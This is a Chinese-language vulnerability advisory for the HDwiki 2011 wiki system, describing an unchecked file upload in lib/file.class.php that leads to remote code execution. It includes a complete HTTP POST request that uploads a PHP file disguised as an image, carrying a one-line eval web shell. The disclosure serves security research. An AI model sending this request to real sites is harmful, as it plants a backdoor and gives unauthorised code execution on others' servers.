HDwiki文件上传导致远程代码执行漏洞

2021-09-21 16:53:55

HDwiki（2011）

互动维客开源系统（HDwiki）作为中国第一家拥有自主知识产权的中文维基（Wiki）系统，由互动在线（北京）科技有限公司于2006 年11月28日正式推出，力争为给国内外众多的维基（Wiki）爱好者提供一个免费、易用、功能强大的维基（Wiki）建站系统

lib/file.class.php中

function uploadfile($attachment,$target,$maxsize=1024,$is_image=1){
$result=array ('result'=>false,'msg'=>'upload mistake');
if($is_image){
$attach=$attachment;
$filesize=$attach['size']/1024;
if(0==$filesize){
$result['msg']='上传错误';
return $result;
}
if(substr($attach['type'],0,6)!='image/'){
$result['msg']='格式错误';
return $result;
}
if($filesize>$maxsize){
$result['msg']='文件过大';
return $result;
}
}else{
$attach['tmp_name']=$attachment;
}
$filedir=dirname($target);
file::forcemkdir($filedir);
if(@copy($attach['tmp_name'],$target)||@move_uploaded_file($attach['tmp_name'],$target)){

没有什么检查 attachment.php里触发

<* 参考

http://www.wooyun.org/bugs/wooyun-2010-02706

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

POST /hdwiki/index.php?attachment-uploadimg HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,*/*
Referer: http://www.wooyun.org/
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7db261e100f2e
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)
Host: www.wooyun.org
Content-Length: 370
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: Hm_lvt_c12f88b5c1cd041a732dea597a5ec94c=1298002704449; hd_sid=raG13H; hd_auth=4113YBBXXB13XtdR6EXTA1Cb9BuhZMK%2F29wdoHDQJTV5QZOoYd62OHd46iXKqf4Qz%2F5gc6pLm9fZ%2Bdgv68MT; hd_searchtime=1300983373
-----------------------------7db261e100f2e
Content-Disposition: form-data; name="MAX_FILE_SIZE"
30000
-----------------------------7db261e100f2e
Content-Disposition: form-data; name="photofile"; filename="C:\fucker\z.php"
Content-Type: image/image
zzz<?eval($_REQUEST[z])?>
-----------------------------7db261e100f2e--

厂商解决方案

目前没有详细解决方案提供：

http://kaiyuan.hudong.com/

码农公寓